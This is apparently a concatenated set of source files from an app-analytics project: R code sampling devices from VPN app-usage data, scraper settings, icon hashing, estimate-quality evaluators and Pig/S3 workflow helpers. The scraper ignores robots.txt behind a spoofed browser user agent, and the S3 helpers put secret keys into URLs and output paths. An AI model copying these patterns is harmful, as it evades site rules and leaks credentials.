###########################
# set working directories #
###########################
bucket = "/s3mnt-projecta/aardvark-prod-pdx-ds-sample"
folder_name_session = paste(bucket,"VPN_APP_USAGE_SESSION",sep="/")
folder_name_pause_resume = paste(bucket,"VPN_PAUSE_RESUME_SESSION",sep="/")
folder_name_connection = paste(bucket,"VPN_CONNECTION_SESSION",sep="/")
folder_name_purchase = paste(bucket,"VPN_DOWNLOAD_TAGGING",sep="/")
folder_name_ingest = paste(bucket,"VPN_DPI_INGEST",sep="/")
folder_name_device = paste(bucket,"VPN_NEW_DEVICE_INFO",sep="/")
#################################### END GLOBAL VARIABLES ####################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
################################## START MAIN CODE ANALYSIS ##################################################
#################
# CONNECTION #
#################
# select date range
rangeDate = readDate(as.Date(startDate)-7,as.Date(endDate)+3)
# set working directory
setwd(folder_name_connection)
cat("Start processing connection data...\n")
# Read session data files for selected dates
us_connection_data = readFolder(folder_name_connection,rangeDate)
colnames(us_connection_data) = c("device_id","start_time","end_time","offset")
# extract date and time (UTC in milliseconds)
us_connection_data$gmt_start_time = as.POSIXct(us_connection_data$start_time/1000,origin="1970-01-01",tz="GMT")
us_connection_data$gmt_end_time = as.POSIXct(us_connection_data$end_time/1000,origin="1970-01-01",tz="GMT")
us_connection_data$gmt_start_date = as.Date(us_connection_data$gmt_start_time)
us_connection_data$gmt_start_hour = as.POSIXlt(us_connection_data$gmt_start_time)$hour
us_connection_data$gmt_end_hour = as.POSIXlt(us_connection_data$gmt_end_time)$hour
# select only columns 'device_id' and 'gmt_start_date'
subset_connection_data = us_connection_data[,c('device_id','gmt_start_date')]
rm(us_connection_data)
gc()
###########################################################################################################
#################
# DEVICE DATA #
#################
# select date range (always start from first date when app launched)
rangeDate = readDate(as.Date("2014-10-01"),Sys.Date() - 1)
# set working directory
setwd(folder_name_device)
cat("Start processing DEVICE data...\n")
# Read session data files for selected dates
device_data = readFolder(folder_name_device,rangeDate)
colnames(device_data) = c("device_id","provider","manufacturer","device","OS","device_type")
# select only iOS data
subset_device_data = subset(device_data, OS == 'iOS', select=c('device_id','device_type'))
rm(device_data)
gc()
###########################################################################################################
#################
# SESSION DATA #
#################
# select date range
rangeDate = readDate(startDate, endDate)
# set working directory
setwd(folder_name_session)
cat("Start processing session data files...\n")
# Read session data files for selected dates
us_session_data = readFolder(folder_name_session,rangeDate)
colnames(us_session_data) = c("device_id","iso_code","city","bundle_id","start_time","end_time","offset")
# extract date and time (UTC in milliseconds)
us_session_data$gmt_start_time = as.POSIXct(us_session_data$start_time/1000, origin="1970-01-01",tz="GMT")
us_session_data$gmt_end_time = as.POSIXct(us_session_data$end_time/1000, origin="1970-01-01",tz="GMT")
us_session_data$gmt_date = as.Date(us_session_data$gmt_start_time)
us_session_data$session_length = with(us_session_data, difftime(gmt_end_time,gmt_start_time))
###########################################################################################################
######################
# PAUSE/RESUME DATA #
######################
# set working directory
setwd(folder_name_pause_resume)
cat("Start processing pause_resume data...\n")
# Read pause/resume data files for selected dates
us_pause_resume = readFolder(folder_name_pause_resume,rangeDate)
colnames(us_pause_resume) = c("device_id","pause_at","resume_at","offset")
# extract date and time (UTC in milliseconds)
us_pause_resume$gmt_pause_time = as.POSIXct(us_pause_resume$pause_at/1000,origin="1970-01-01",tz="GMT")
us_pause_resume$gmt_resume_time = as.POSIXct(us_pause_resume$resume_at/1000,origin="1970-01-01",tz="GMT")
us_pause_resume$gmt_pause_date = as.Date(us_pause_resume$gmt_pause_time)
us_pause_resume$gmt_resume_date = as.Date(us_pause_resume$gmt_resume_time)
# select only columns 'device_id' and 'gmt_pause_date'
subset_pause_data = us_pause_resume[,c('device_id','gmt_pause_date')]
rm(us_pause_resume)
gc()
##########################################################################################################
# get active devices for the week
start_week = as.Date(startDate)
active_devices = active_devices_date(start_week)
for(i in 1:6) active_devices = intersect(active_devices, active_devices_date(start_week+i))
# select devices with specific device type
dev_type = c("Smartphone","Tablet")
dev=dev_type[1]
active_devices_dev_type = intersect(active_devices, subset_device_data[subset_device_data$device_type == dev,'device_id'])
# select devices with US only for entire week
check_country = subset(us_session_data, device_id %in% active_devices_dev_type, select=c(device_id,iso_code))
check_country = check_country[!duplicated(check_country),]
final_subset_device_id = names(which(table(check_country$device_id)==1))
# select device_ids for final sample
final_active_devices = intersect(final_subset_device_id,active_devices_dev_type)
dataset = subset(us_session_data, device_id %in% final_active_devices ,select=device_id:session_length)
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/settings.py
# -*- coding: utf-8 -*-
# Scrapy settings for scraper project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
#
BOT_NAME = 'scraper'
SPIDER_MODULES = ['scraper.spiders']
NEWSPIDER_MODULE = 'scraper.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scraper (+http://www.yourdomain.com)'
ROBOTSTXT_OBEY = False
COOKIES_ENABLED = True
DOWNLOAD_DELAY = 1
CONCURRENT_REQUESTS_PER_DOMAIN = 1
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'
#LOG_FILE = 'log_scrape.log'
#LOG_LEVEL = 'INFO'
ITEM_PIPELINES = {
'scraper.pipelines.ConvertData': 300
}
<file_sep>/exact-matching-improvement/icon_lib/icon_processing.py
"""
Module for processing icons. Main functions:
- get_raw_image: get icons from URL and write to disk (optional)
- generate_no_icon_data: generate image data for 'no icon available'-icon
- display_image: display strings with images
- process_local_icon: process (=hash & compute statistics) for local icons
- process_online_icon: process (=hash & compute statistics) for online icons
"""
__author__ = 'srhmtonk'
from subprocess import PIPE, Popen
from IPython.display import display, Image
import requests
import cStringIO
import PIL
import imagehash
import time
from config import (DEFAULT_HASH_TYPE, DEFAULT_HASH_SIZE)
from io import BytesIO
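# Illustrative usage sketch (the icon id in the URL below is hypothetical;
# hash type/size defaults come from config):
#
#   no_icon = generate_no_icon_data()
#   icon = process_online_icon('http://assets-01.distimo.com/icons/1/12345')
#   if icon is not None and icon['hash'] != no_icon['hash']:
#       print icon['hash'], (icon['avg_r'], icon['avg_g'], icon['avg_b'])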
def get_raw_image(url, filename=None, raw_filter_image=None):
"""
Retrieve raw image bytecode from url.
:param url: URL to load icon image from
:param filename: Path to save image to (optional)
:param raw_filter_image: String with image to filter loaded images with.
:return: string with image
"""
try:
response = requests.get(url, stream=True)
except requests.exceptions.ConnectionError:
time.sleep(5)
response = requests.get(url, stream=True)
if response.status_code == requests.codes.ok:
raw_image = response.raw.read(decode_content=True)
if raw_filter_image:
raw_image = filter_image(raw_image, raw_filter_image)
if filename is not None:
with open(filename, 'w') as f:
f.write(raw_image)
else:
raw_image = None
return raw_image
def filter_image(raw_image, raw_filter_image):
"""
    Filters out a known placeholder icon (e.g. Distimo's 'no icon available (yet)').
    A string with a blank white image of the same size and type is returned if
    raw_image is byte-identical to raw_filter_image.
:param raw_image: String with image
:param raw_filter_image: String with icon to filter out
:return: String with (possibly if filtered white) image
"""
has_same_length = (len(raw_image) == len(raw_filter_image))
if has_same_length and (raw_image == raw_filter_image):
raw_image = generate_white_image_string(raw_image)
return raw_image
def generate_white_image_string(raw_image):
"""
Generate a string containing a white image
:param raw_image: String with image
:return: String with image of the same size and type as the input image
"""
pil_image = convert_to_pil_image(raw_image)
white_image = PIL.Image.new(pil_image.mode, pil_image.size, color='white')
img_buffer = cStringIO.StringIO()
white_image.save(img_buffer, format=pil_image.format)
return img_buffer.getvalue()
def convert_to_pil_image(raw_image):
"""
Convert raw image to PIL image
"""
image_stream = cStringIO.StringIO(raw_image)
return PIL.Image.open(image_stream)
def generate_no_icon_data(display_icon=False):
"""
Generate the icon that is return when icon was not found.
"""
raw_no_image = get_no_icon()
    return process_icon(raw_no_image, display_icon=display_icon)
def get_no_icon(no_icon_url='http://assets-01.distimo.com/icons/1/no-icon', url_suffix='?size=64'):
"""
    Gets the raw 'no icon' placeholder image.
    :param no_icon_url: No icon url
    :param url_suffix: Suffix to append
    :return: string with the raw image bytes
"""
return get_raw_image(no_icon_url + url_suffix)
def display_image(image, image_format='png'):
"""
Display the raw image bytecode in IPython notebook.
"""
bio = BytesIO()
image.save(bio, format=image_format)
display(Image(bio.getvalue(), format=image_format))
def process_local_icon(file_name, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE, display_icon=False):
"""
Retrieve and process local icon.
"""
    with open(file_name, "r") as myfile:
        raw_icon = myfile.read()
    return process_icon(raw_icon, hash_type, hash_size, display_icon)
def process_online_icon(icon_url, url_suffix='?size=64', hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
display_icon=False):
"""
Retrieve and process icon stored at icon_url.
"""
raw_icon = get_raw_image(icon_url+url_suffix)
if raw_icon is None:
result = None
else:
result = process_icon(raw_icon, hash_type, hash_size, display_icon)
return result
def process_icon(raw_icon, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE, display_icon=False):
"""
Process the raw icon: convert to PIL image, compute hash and average color.
"""
raw_icon_converted = convert_raw_image(raw_icon)
icon_converted = convert_to_pil_image(raw_icon_converted)
if display_icon:
display_image(icon_converted)
result = {}
result['hash'] = str(compute_imagehash(icon_converted, hash_type, hash_size))
result['avg_r'], result['avg_b'], result['avg_g'] = compute_averagecolor(icon_converted)
return result
def convert_raw_image(raw_image):
"""
Convert the raw image; flatten, auto-level, resize and make circular.
"""
# "convert \( fd:0 -flatten -auto-level -resize 64x64 \)"+
# " \( +clone -alpha extract \)"+
# " \( +clone -fill white -colorize 100% -background black -vignette 1x1+4+4 \)"+
# " \( -clone 1 -clone 2 -compose multiply -composite \)"+
# " -delete 1,2 -alpha off -compose copy_opacity -composite -flatten png:fd:1",
proc = Popen("convert \( fd:0 -flatten -auto-level -resize 64x64 \)"+
" \( +clone -alpha extract \)"+
" \( +clone -fill white -colorize 100% -background black -vignette 1x1+4+4 \)"+
" \( -clone 1 -clone 2 -compose multiply -composite \)"+
" -delete 1,2 -alpha off -composite png:fd:1",
shell=True, stdout=PIPE, stdin=PIPE, stderr=PIPE)
proc.stdin.write(raw_image)
proc.stdin.close()
conv_raw_image = proc.stdout.read()
proc.kill()
return conv_raw_image
def compute_imagehash(image, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Compute the hash over the raw image bytecode.
"""
if hash_type == 'ahash':
computed_hash = imagehash.average_hash(image, hash_size=hash_size)
elif hash_type == 'dhash':
computed_hash = imagehash.dhash(image, hash_size=hash_size)
elif hash_type == 'phash':
computed_hash = imagehash.phash(image, hash_size=hash_size)
else:
raise Exception("hash_type should be 'ahash, 'dhash' or 'phash'")
return computed_hash
def compute_averagecolor(image):
"""
Compute the average image color from the raw image bytecode.
"""
histogram = image.histogram()
# split into red, green, blue
r, g, b = histogram[0:256], histogram[256:256*2], histogram[256*2:256*3]
    sum_r, sum_g, sum_b = sum(r), sum(g), sum(b)
# perform the weighted average of each channel:
# the *index* is the channel value, and the *value* is its weight
return (
sum( i*w for i, w in enumerate(r) ) / sum_r if sum_r>0 else 0,
sum( i*w for i, w in enumerate(g) ) / sum_g if sum_g>0 else 0,
sum( i*w for i, w in enumerate(b) ) / sum_b if sum_b>0 else 0
)
<file_sep>/old_investigations/internal/config.py
import sys
import os.path
# Mark's script's path
daily_estimate_script_path = "/Users/perezrafael/appannie/aa/estimation/ios/gen_daily_app_estimates.py"
if not os.path.exists(daily_estimate_script_path):
print("Error: Please specify the right path for daily estimate script!!!")
sys.exit(2)
<file_sep>/product_quality/internal/processor.py
"""Processors for estimating the quality of the results.
Refactored by <NAME> (<EMAIL>) based on Rafael
(<EMAIL>)'s original code.
Each processor accept a DataFrame as the argument, and returns a 3-tuple, include:
- DataFrame: Some processor will alter the DataFrame, adding or deleting information.
- Header: The header will be prefixed to the response of the current scope (explain later).
- Response: A str or a list of str, representing the output of the processor.
The processors are chained with ChainProcessor by passing them to its
constructor. Processors can be scoped by encapsulating them in a nested
list. The processors inside a scope may alter the header and/or DataFrame, but
the alteration doesn't affect the processors outside the scope.
"""
import collections
import pandas as pd
import numpy as np
from scipy.stats import ks_2samp
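# Illustrative usage sketch (assumes a DataFrame with 'app_id', 'units' and
# 'estimate' columns, which is what the processors below expect):
#
#   chain = ChainProcessor(
#       HeaderWriter("Overall: "),
#       RelErrorMedianEvaluator(),
#       [UnitRankRangeFilter([1, 20]),
#        RelErrorRatioEvaluator(0.2)],
#   )
#   _, _, report = chain.process(df)
#   print report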
class ChainProcessor(object):
def __init__(self, *args):
self._processors = args
def process(self, df):
return self._use_processes(self._processors, df)
def _use_processes(self, ps, df):
res_all = ""
current_header = ""
for p in ps:
if isinstance(p, collections.Iterable):
(_, _, res) = self._use_processes(p, df)
else:
(df, header, res) = p.process(df)
if isinstance(header, str):
current_header = header
if isinstance(res, str):
res_all += (current_header + res)
elif isinstance(res, collections.Iterable):
res_all += ''.join([current_header + s for s in res])
return (df, "", res_all)
class HeaderWriter(object):
"""Re-write the header
"""
def __init__(self, header):
self._header = header
def process(self, df):
return (df, self._header, None)
############################# Filter #########################################
# Usually, they alter the dataframe by filtering out some rows. #
# No header or output will be added. #
##############################################################################
class UnitRankRangeFilter(object):
"""Select apps with RankRange.
"""
def __init__(self, rank_range):
self._rank_range = rank_range
def process(self, df):
header = ""
if self._rank_range[0] == 1:
header = "(Top %d (by real units)) " % self._rank_range[1]
else:
header = "(Rank (by real units) range: %d--%d) " % (self._rank_range[0], self._rank_range[1])
return (self._filter_by_rank_range(df),
header, None)
def _filter_by_rank_range(self, df):
if 'date' in df.columns:
return self._filter_by_rank_range_with_date(df)
else:
return self._filter_by_rank_range_without_date(df)
def _filter_by_rank_range_without_date(self, df):
rank_range = self._rank_range
        selected = df.sort('units', ascending=False)[(rank_range[0] - 1):rank_range[1]]
top_apps = selected[['app_id']]
return df.merge(top_apps, on=['app_id'])
def _filter_by_rank_range_with_date(self, df):
"""Select apps within the rank range in each day.
"""
rank_range = self._rank_range
top_apps = pd.DataFrame(columns=['date', 'app_id'])
grouped = df.groupby(['date'])
for _, group in grouped:
            group = group.sort('units', ascending=False)
            selected = group[(rank_range[0] - 1):rank_range[1]]
top_apps = top_apps.append(selected[['date', 'app_id']])
return df.merge(top_apps, on=['date', 'app_id'])
class MedianRankRangeFilter(object):
def __init__(self, rank_range):
self._rank_range = rank_range
def process(self, df):
header = ""
if self._rank_range[0] == 0:
header = "(Top %d) " % self._rank_range[1]
else:
header = "(Median Rank range: %d--%d) " % (self._rank_range[0], self._rank_range[1])
return (self._filter_by_rank_range(df),
header, None)
def _filter_by_rank_range(self, df):
rank_range = self._rank_range
if isinstance(df['median_rank'][0], str):
df['median_rank'] = df['median_rank'].map(lambda s: np.asarray([float(x) for x in s.split(',')]))
sel = df['median_rank'].map(lambda x: np.any(np.logical_and(x >= rank_range[0], x <= rank_range[1])))
return df[sel]
############################# Calculator #####################################
# Usually, they add a column to the dataframe by calculating something. #
# No header or output will be added. #
##############################################################################
class SBECalculator(object):
"""Add a 'sbe' column.
"""
def process(self, df):
df = self._generate_and_merge_sbe(df)
return (df, None, None)
def _generate_and_merge_sbe(self, df):
# Aggregate (mean) across categories
gdf = df.groupby(['store_id', 'feed_id', 'app_id', 'date'])['estimate'].mean()
gdf = gdf.reset_index()
# Aggregate (sum) across feeds
ddf = gdf.groupby(['store_id', 'app_id', 'date'])['estimate'].sum()
ddf = ddf.reset_index()
ddf.rename(columns={'estimate': 'sbe'}, inplace=True)
return df.merge(ddf, on=['store_id', 'app_id', 'date'])
class RelErrorCalculator(object):
def __init__(self, est_column='estimate'):
self._est_column = est_column
def process(self, df):
relerror = (df['units'] - df[self._est_column]).abs() / df['units']
df['relerror'] = relerror
return (df, None, None)
class AbsErrorCalculator(object):
def __init__(self, est_column='estimate'):
self._est_column = est_column
def process(self, df):
abserror = (df['units'] - df[self._est_column]).abs()
df['abserror'] = abserror
return (df, None, None)
############################# Evaluator ######################################
# They will evaluate the results and generate response str. #
# Generally, dataframe will keep unaltered. #
##############################################################################
class RelErrorRatioEvaluator(object):
"""Used for evaluating the percentage of apps goes beyond the rel error threshold.
"""
def __init__(self, max_rel_error):
"""
Parameters
----------
max_rel_error: float, the error threshold.
"""
self._max_rel_error = max_rel_error
def process(self, df):
if 'relerror' in df.columns:
rel_error = df['relerror']
else:
rel_error = (df['units'] - df['estimate']).abs() / df['units']
percent = (rel_error >= self._max_rel_error).sum() / float(rel_error.shape[0])
res = "%% of analytics apps over %.0f%% error: %f\n" % (self._max_rel_error * 100, percent)
return (df, None, res)
class RelErrorAndAbsErrorEvaluator(object):
"""Evaluate the Relative error and absolute error at the same time.
e.g. Percentage of apps goes beyond 10% relerror AND 100 units abserror.
"""
def __init__(self, max_rel_error, max_abs_error):
self._max_rel_error = max_rel_error
self._max_abs_error = max_abs_error
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
if 'relerror' in df.columns:
rel_error = df['relerror']
else:
rel_error = abs_error / df['units']
percent = ((rel_error >= self._max_rel_error) & (abs_error >= self._max_abs_error)).sum() / float(rel_error.shape[0])
res = "%% of analytics apps over %.0f%% and %.2f units error: %f\n" % (self._max_rel_error * 100,
self._max_abs_error,
percent)
return (df, None, res)
class RelErrorMedianEvaluator(object):
"""Evaluate the median of the relative error.
"""
def process(self, df):
if 'relerror' in df.columns:
relative_diff = df['relerror']
else:
relative_diff = (df['units'] - df['estimate']).abs() / df['units']
med = relative_diff.median()
res = "median relative error: %f\n" % med
return (df, None, res)
class AbsErrorMedianEvaluator(object):
"""Evaluate the median of the relative error.
"""
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
med = abs_error.median()
res = "median absolute error: %f\n" % med
return (df, None, res)
class RelErrorAvgEvaluator(object):
"""Evaluate the average of the relative error.
"""
def process(self, df):
if 'relerror' in df.columns:
relative_diff = df['relerror']
else:
relative_diff = (df['units'] - df['estimate']).abs() / df['units']
mean = relative_diff.mean()
res = "average relative error: %f\n" % mean
return (df, None, res)
class AbsErrorAvgEvaluator(object):
"""Evaluate the average of the relative error.
"""
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
mean = abs_error.mean()
res = "average absolute error: %f\n" % mean
return (df, None, res)
class SampleNumEvaluator(object):
"""Get the number of samples
"""
def process(self, df):
res = "num of samples: %d\n" % df.shape[0]
return (df, None, res)
class EstimationSDEvaluator(object):
"""The average SD of estimations across categories.
"""
def process(self, df):
res = "Multiple category Estimates Mean Standard Deviation: %f\n" % df['estimate_sd'].mean()
return (df, None, res)
class KSEvaluator(object):
"""Kolmogorov-Smirnof statistic.
Use Kolmogorov-Smirnof statistic to test if CDF of actuals
and estimates belong to the same distribution.
If they belong to the same distribution could mean correct estimates.
ks_stat[0] is the K-S statistic, smaller values are better
ks_stat[1] is the p-value, higher values are better
"""
def process(self, df):
units = df['units']
est = df['estimate']
ks_stat = ks_2samp(units, est)
res = []
res.append("Distributions similarity KS-Stat: %s\n" % ks_stat[0])
res.append("Distributions similarity p-value: %s\n" % ks_stat[1])
return (df, None, res)
<file_sep>/old_investigations/android/README.md
Please read the ../README.md for more details.
For GP, it's almost the same as iOS, just with different parameters.
<file_sep>/aa_au_model/hive_scripts/workflow/module/utils.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import re
import os
import simplejson
import sys
import datetime
import time
import commands
from constants import SCHEMA_PATH_MAPPING
def get_s3_storage_info(schema_name, params, settings):
schema = load_schema(schema_name)
key_name = replace_params(schema['table'], params)
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
bucket = getattr(settings, schema['bucket'])
return access_key, secret_key, bucket, key_name
def replace_params(s, params):
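    # Substitute longer keys first (keys are reverse-sorted) so that '$date'
    # cannot clobber the prefix of a longer placeholder like '$date_str'.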
    kw = sorted(params.iteritems(), key=lambda kv: kv[0], reverse=True)
for k, v in kw:
if '$' + k in s:
s = s.replace('$' + k, str(v))
return s
def last_time_range(date_str, hour, interval):
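    """Yield the last `interval` days (or hours) ending at date_str (+ hour).

    With hour=None, plain 'YYYY-MM-DD' strings are yielded. Otherwise hours
    are walked backwards one by one; a fully covered day (all 24 hours)
    collapses to a single 'YYYY-MM-DD', while partially covered days yield
    individual 'YYYY-MM-DD/HH' entries.
    """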
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
if hour is None:
for i in range(interval):
cur_date = date - datetime.timedelta(days=i)
yield cur_date.strftime('%Y-%m-%d')
else:
begin_hour = datetime.datetime.strptime(date_str + ' %s' % hour, '%Y-%m-%d %H')
temp_list = []
pre_hour = begin_hour
for i in range(interval):
cur_hour = begin_hour - datetime.timedelta(hours=i)
if cur_hour.day != pre_hour.day:
if len(temp_list) == 24:
yield pre_hour.strftime('%Y-%m-%d')
else:
for tt in temp_list:
yield tt.strftime('%Y-%m-%d/%H')
temp_list = []
temp_list.append(cur_hour)
pre_hour = cur_hour
if len(temp_list) == 24:
yield cur_hour.strftime('%Y-%m-%d')
else:
for tt in temp_list:
yield tt.strftime('%Y-%m-%d/%H')
def determine_load_time_range(schema_name, table, params):
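    """Build the date (or date/hour) glob used in a LOAD path.

    A schema name may carry a ':<interval>[:<date>[:<hour>]]' suffix (an
    interval ending in 'H' means hourly); it is expanded via last_time_range()
    into a '{date1,date2,...}' glob. Without a suffix, '$date' (or
    '$date/$hour') is returned unchanged.
    """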
date_range = '$date'
load_hour = params.get('hour')
load_date = params.get('date')
if '$date/$hour' in table:
date_range = '$date/$hour'
else:
date_range = '$date'
if len(schema_name.split(':', 1)) == 2:
interval_s = replace_params(schema_name.split(':', 1)[1], params)
interval_l = interval_s.split(':')
interval = int(interval_l[0][:-1]) if interval_l[0].endswith('H') else int(interval_l[0])
if len(interval_l) >= 2:
load_date = interval_l[1]
if len(interval_l) >= 3:
load_hour = interval_l[2]
if interval_l[0].endswith('H') and load_hour is None:
load_hour = '00'
elif not interval_l[0].endswith('H'):
load_hour = None
date_range = '{' + ','.join([d for d in last_time_range(str(load_date), load_hour, interval)]) + '}'
return date_range
def generate_hbase_load_str(schema, t=None):
"""
Generate hbase load string
"""
return ("""'hbase://%(table_name)s'
USING org.apache.pig.backend.hadoop.hbase.HBaseStorage (
'%(columns)s', '-caching 500') AS (%(schema)s)""" % {
'table_name': (schema['table'] if not t else schema['table'] + '_%s' % t),
'columns': ' '.join([k[0] for k in schema['schema']]),
'schema': ', '.join([k[1] for k in schema['schema']])
})
def generate_hdfs_load_str(schema, t=None):
"""
Generate hdfs load string
"""
return ("""'$input_root_dir/%(table_name)s' AS (%(schema)s)
""") % {
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
def generate_hdfs_store_str(schema, t=None):
store_str = "'$output_root_dir/%s'" % schema['table']
if 'multi_storage_column' in schema:
multi_storage_column = [
i for i in range(len(schema['schema']))
if schema['schema'][i].startswith('%s:' % schema['multi_storage_column'])
][0]
store_str = re.sub(r'\$%s\'$' % schema['multi_storage_column'], '\'', store_str)
store_str += " USING org.apache.pig.piggybank.storage.MultiStorage(%s, '%s', 'none', '\\\\t')" % (
store_str, multi_storage_column
)
return (
store_str,
'$output_root_dir/%s' % schema['table']
)
def generate_s3_store_str(schema, t=None):
if t:
return (
"'$output_root_dir/%s'" % schema['table'],
'$output_root_dir/%s' % schema['table']
)
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
bucket_name = getattr(settings, schema['bucket'])
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
store_str = "'s3n://%s/%s'" % (bucket_name, schema['table'])
if schema.get('need_credential'):
store_str = "'s3n://%s:%s@%s/%s'" % (access_key, secret_key, bucket_name, schema['table'])
table_out = schema['table']
if 'multi_storage_column' in schema:
multi_storage_column = [
i for i in range(len(schema['schema']))
if schema['schema'][i].startswith('%s:' % schema['multi_storage_column'])
][0]
store_str = re.sub(r'\$%s\'$' % schema['multi_storage_column'], '\'', store_str)
table_out = re.sub(r'\$%s$' % schema['multi_storage_column'], '', schema['table'])
store_str += " USING org.apache.pig.piggybank.storage.MultiStorage(%s, '%s', 'none', '\\\\t')" % (
store_str, multi_storage_column
)
return (
store_str,
's3n://%s:%s@%s/%s' % (access_key, secret_key, bucket_name, table_out)
)
def generate_s3_load_str(schema, t=None):
if t:
return ("""'$input_root_dir/%(table_name)s' AS (%(schema)s)
""") % {
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
bucket_name = getattr(settings, schema['bucket'])
if schema.get('need_credential'):
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
bucket_name = '%s:%s@%s' % (access_key, secret_key, bucket_name)
return ("""'s3n://%(bucket_name)s/%(table_name)s' AS (%(schema)s)
""") % {
'bucket_name': bucket_name,
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
def generate_hbase_store_str(schema, t=None):
params = {
'table': (schema['table'] if not t else schema['table'] + '_%s' % t),
'storage': 'org.apache.pig.backend.hadoop.hbase.HBaseStorage',
'schema': ' '.join([k[0] for k in schema['schema']])
}
return (
"""'%(table)s' USING %(storage)s ('%(schema)s', '-caster HBaseBinaryConverter')""" % params,
(schema['table'] if not t else schema['table'] + '_%s' % t)
)
def generate_local_load_str(schema, t=None):
    from conf import settings
    local_root_dir = getattr(settings, schema['local_root_dir'])
    # Build the LOAD string once, log it, and return it.
    load_str = ("""'%(local_root_dir)s/%(table)s' AS (%(schema)s)
""") % {
        'local_root_dir': local_root_dir,
        'table': schema['table'],
        'schema': ', '.join(schema['schema'])
    }
    print load_str
    return load_str
def generate_local_store_str(schema, t=None):
from conf import settings
local_root_dir = getattr(settings, schema['local_root_dir'])
print "STORE:" + local_root_dir + schema['table']
return (
"'%s/%s'" % (local_root_dir, schema['table']),
"'%s/%s'" % (local_root_dir, schema['table'])
)
LOAD_STR_FUNC_MAPPING = {
'hbase': generate_hbase_load_str,
'hdfs': generate_hdfs_load_str,
's3': generate_s3_load_str,
'local': generate_local_load_str
}
STORE_STR_FUNC_MAPPING = {
'hbase': generate_hbase_store_str,
'hdfs': generate_hdfs_store_str,
's3': generate_s3_store_str,
'local': generate_local_store_str
}
def load_schema(schema_name):
try:
p = {}
if '|' in schema_name:
schema_name, p_s = schema_name.split('|')
p.update(dict(
i.split('=')
for i in p_s.split(',')
))
schema_path = SCHEMA_PATH_MAPPING[schema_name.lower()[-2:]]
schema_def_root_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../../schema', schema_path
)
schema_def_file_path = os.path.join(
schema_def_root_path, '%s.schema' % schema_name.lower()
)
d = simplejson.loads(
open(schema_def_file_path, 'r').read()
)
d['schema_name'] = schema_name
d['table'] = replace_params(d['table'], p)
return d
except:
return None
def generate_pig_file(pig_file_path, pig_file_name, params, t=None):
"""
Generate running pig file
"""
whole_path = os.path.join(pig_file_path, pig_file_name + '.pig')
pig_file_str = open(whole_path, 'r').read()
pig_file_str = replace_load_str(pig_file_str, params, t)
# Since pig local model did not support 'skewed', so remove it when local testing
if t:
pig_file_str = pig_file_str.replace(" USING 'skewed'", '')
pig_file_str, output_path_list = replace_store_str(pig_file_str, t)
timestamp = datetime.datetime.now().strftime('%s%f')
output_file_path = os.path.join(
pig_file_path, '%s_%s.pig' % (pig_file_name, timestamp)
)
f = open(output_file_path, 'w')
f.write(pig_file_str)
f.close()
return output_file_path, output_path_list
def replace_load_str(pig_file_str, params, t=None):
"""
Replace LOAD code in pig with real LOAD string
"""
schema_list = re.findall(r'LOAD ###(.+?)###', pig_file_str)
for schema_name in set(schema_list):
schema = load_schema(schema_name.split(':')[0])
date_range = determine_load_time_range(schema_name, schema['table'], params)
load_str = LOAD_STR_FUNC_MAPPING[schema['type']](schema, t)
if date_range not in load_str:
load_str = re.sub(r'\$date/\$hour.*?\'', date_range + '\'', load_str)
load_str = re.sub(r'\$date.*?\'', date_range + '\'', load_str)
pig_file_str = pig_file_str.replace(
'LOAD ###%s###;' % schema_name,
'LOAD %s;' % load_str
)
return pig_file_str
def replace_store_str(pig_file_str, t=None):
"""
Replace STORE code in pig with real STORE string
"""
schema_list = re.findall(r'INTO ###(.+?)###', pig_file_str)
output_path_list = []
for schema_name in set(schema_list):
schema = load_schema(schema_name)
store_str, output_path = STORE_STR_FUNC_MAPPING[schema['type']](schema, t)
pig_file_str = pig_file_str.replace(
'INTO ###%s###' % schema_name,
"INTO %s" % store_str
)
output_path_list.append(output_path)
return pig_file_str, output_path_list
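# Template convention (a sketch; 'my_schema' is a hypothetical schema name):
# a pig template containing
#   raw = LOAD ###my_schema###;
#   STORE result INTO ###my_schema###;
# gets its placeholders expanded into full LOAD/STORE clauses by the function
# from LOAD_STR_FUNC_MAPPING / STORE_STR_FUNC_MAPPING matching the schema 'type'.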
def parse_s3_str(s3_str):
access_key = s3_str.rsplit(':', 1)[0][6:]
secret_key = s3_str.rsplit(':', 1)[1].split('@')[0]
bucket_name = s3_str.split('@')[1].split('/', 1)[0]
key_name = s3_str.split('@')[1].split('/', 1)[1]
return access_key, secret_key, bucket_name, key_name
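# e.g. (hypothetical credentials):
#   parse_s3_str("s3n://AKIAEXAMPLE:secretkey@my-bucket/path/to/key")
#   -> ('AKIAEXAMPLE', 'secretkey', 'my-bucket', 'path/to/key')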
def retry_cmd_on_aws_error(cmd):
status, output = 0, 'Rate exceeded'
